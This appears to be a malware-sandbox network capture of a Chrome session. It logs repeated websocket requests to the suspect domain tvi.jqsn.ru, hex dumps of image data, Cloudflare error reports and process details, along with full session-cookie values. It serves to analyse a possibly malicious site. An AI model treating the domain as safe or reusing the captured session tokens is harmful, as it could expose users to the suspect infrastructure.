                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 87585517392bb0c4-ATL
                                                                                                                          2024-04-17 00:34:59 UTC597INData Raw: 33 32 62 33 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 8e 00 00 03 83 08 06 00 00 00 11 c6 07 ce 00 00 20 00 49 44 41 54 78 01 ec dd cf 71 e3 c6 b6 07 e0 09 c1 21 38 04 6f 6e 95 97 13 c2 ac df 7b 0b 87 a0 12 34 7b ef ef 7b 55 0a 41 21 78 e7 ed 84 a0 10 74 33 50 06 7e d5 53 38 36 0d 13 10 4e 13 7f 1a e0 37 55 53 4d 89 0d 10 f8 70 9a 22 1b 3f 82 9f 3e f9 47 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01
                                                                                                                          Data Ascii: 32b3PNGIHDR IDATxq!8on{4{{UA!xt3P~S86N7USMp"?>G @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                          2024-04-17 00:34:59 UTC1369INData Raw: 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08
                                                                                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                          2024-04-17 00:34:59 UTC1369INData Raw: 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10
                                                                                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                          2024-04-17 00:34:59 UTC1369INData Raw: 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20
                                                                                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                          2024-04-17 00:34:59 UTC1369INData Raw: 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                                                                                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                          2024-04-17 00:34:59 UTC1369INData Raw: 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80
                                                                                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                          2024-04-17 00:34:59 UTC1369INData Raw: 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00
                                                                                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                          2024-04-17 00:34:59 UTC1369INData Raw: 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                                                                                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                          2024-04-17 00:34:59 UTC1369INData Raw: 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80
                                                                                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                                                                                          2024-04-17 00:34:59 UTC1369INData Raw: 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00
                                                                                                                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          66192.168.2.449815104.21.3.1474433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:35:01 UTC1275OUTGET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: Upgrade
                                                                                                                          Pragma: no-cache
                                                                                                                          Cache-Control: no-cache
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Upgrade: websocket
                                                                                                                          Origin: https://tvi.jqsn.ru
                                                                                                                          Sec-WebSocket-Version: 13
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
                                                                                                                          Sec-WebSocket-Key: qoxSASM6VH2mZMtoTaEyjQ==
                                                                                                                          Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                          2024-04-17 00:35:01 UTC575INHTTP/1.1 400 Bad Request
                                                                                                                          Date: Wed, 17 Apr 2024 00:35:01 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3xjdm%2Bczy%2FUmbW2kZHhQrm8UwtN7JMLDM7w6U1sBoTP18aRqlRExTwY2mdHCgiffzf4Uu4ex84AxvZ2ldTth57%2FJENF883gabmDk9xZDQwmiwZrNlcRR1F2p%2FDdLOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8758552d1882b08e-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-04-17 00:35:01 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                                                                                          Data Ascii: 22{"code":3,"message":"Bad request"}
                                                                                                                          2024-04-17 00:35:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          67192.168.2.449819104.21.3.1474433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:35:22 UTC1275OUTGET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: Upgrade
                                                                                                                          Pragma: no-cache
                                                                                                                          Cache-Control: no-cache
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Upgrade: websocket
                                                                                                                          Origin: https://tvi.jqsn.ru
                                                                                                                          Sec-WebSocket-Version: 13
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
                                                                                                                          Sec-WebSocket-Key: or0UEKeR5dkerPNQYVsm7Q==
                                                                                                                          Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                          2024-04-17 00:35:23 UTC579INHTTP/1.1 400 Bad Request
                                                                                                                          Date: Wed, 17 Apr 2024 00:35:23 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F%2FZGeX8XDmlffzDmc1t6f41bcos0m8Co1w90mWMOzo%2B%2FO5W%2BOT9oFYNAjq%2FOQAk3buZ9eeVmak4CZTuiPjlPnKcD%2FVXaLUoFbfXWnrtA4hlKpc2tF3cVx3oSFuvkpQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 875855b3bde64570-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-04-17 00:35:23 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                                                                                          Data Ascii: 22{"code":3,"message":"Bad request"}
                                                                                                                          2024-04-17 00:35:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          68192.168.2.44982135.190.80.14433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:35:29 UTC532OUTOPTIONS /report/v4?s=VfSW17u%2FJbQlKjlAX2MhIaaou%2BtMjSJ3U9fUs5Etgj9wpW8I2O%2FIRVyd04sSLcCbkJxI1Fyj0MMvC%2FfkYgTvcKulJKA1mKLQGfJuveHgtVc6QBobl29vkg3q9YY7aA%3D%3D HTTP/1.1
                                                                                                                          Host: a.nel.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Origin: https://tvi.jqsn.ru
                                                                                                                          Access-Control-Request-Method: POST
                                                                                                                          Access-Control-Request-Headers: content-type
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-04-17 00:35:29 UTC336INHTTP/1.1 200 OK
                                                                                                                          Content-Length: 0
                                                                                                                          access-control-max-age: 86400
                                                                                                                          access-control-allow-methods: POST, OPTIONS
                                                                                                                          access-control-allow-origin: *
                                                                                                                          access-control-allow-headers: content-type, content-length
                                                                                                                          date: Wed, 17 Apr 2024 00:35:28 GMT
                                                                                                                          Via: 1.1 google
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          69192.168.2.44982235.190.80.14433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:35:29 UTC478OUTPOST /report/v4?s=VfSW17u%2FJbQlKjlAX2MhIaaou%2BtMjSJ3U9fUs5Etgj9wpW8I2O%2FIRVyd04sSLcCbkJxI1Fyj0MMvC%2FfkYgTvcKulJKA1mKLQGfJuveHgtVc6QBobl29vkg3q9YY7aA%3D%3D HTTP/1.1
                                                                                                                          Host: a.nel.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Content-Length: 854
                                                                                                                          Content-Type: application/reports+json
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-04-17 00:35:29 UTC854OUTData Raw: 5b 7b 22 61 67 65 22 3a 33 34 38 36 39 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 38 30 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 33 30 2e 32 31 32 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 74 76 69 2e 6a 71 73 6e 2e 72
                                                                                                                          Data Ascii: [{"age":34869,"body":{"elapsed_time":1803,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"172.67.130.212","status_code":404,"type":"http.error"},"type":"network-error","url":"https://tvi.jqsn.r
                                                                                                                          2024-04-17 00:35:29 UTC168INHTTP/1.1 200 OK
                                                                                                                          Content-Length: 0
                                                                                                                          date: Wed, 17 Apr 2024 00:35:29 GMT
                                                                                                                          Via: 1.1 google
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          70192.168.2.449823104.21.3.1474433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:35:44 UTC1275OUTGET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: Upgrade
                                                                                                                          Pragma: no-cache
                                                                                                                          Cache-Control: no-cache
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Upgrade: websocket
                                                                                                                          Origin: https://tvi.jqsn.ru
                                                                                                                          Sec-WebSocket-Version: 13
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
                                                                                                                          Sec-WebSocket-Key: MNndqb1+gtcvapOhZeqxvQ==
                                                                                                                          Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                          2024-04-17 00:35:45 UTC569INHTTP/1.1 400 Bad Request
                                                                                                                          Date: Wed, 17 Apr 2024 00:35:45 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wiltGawGXTJWFJYBnRQjHzYsb3uyuHCnnuDRYS7Kaqiu77lzK7ld3uwjwzvsiOAjISXLdXpgaTd5FuINu1xbMRaM1avdgrNKTjh4HHBsGl%2FYBxOzM7xGNA6qQXWJvg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 87585639ea46adc6-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-04-17 00:35:45 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                                                                                          Data Ascii: 22{"code":3,"message":"Bad request"}
                                                                                                                          2024-04-17 00:35:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Click to jump to process

                                                                                                                          Click to jump to process

                                                                                                                          Click to jump to process

                                                                                                                          Target ID:0
                                                                                                                          Start time:02:34:17
                                                                                                                          Start date:17/04/2024
                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                          File size:3'242'272 bytes
                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:low
                                                                                                                          Has exited:false

                                                                                                                          Target ID:2
                                                                                                                          Start time:02:34:19
                                                                                                                          Start date:17/04/2024
                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          Wow64 process (32bit):false
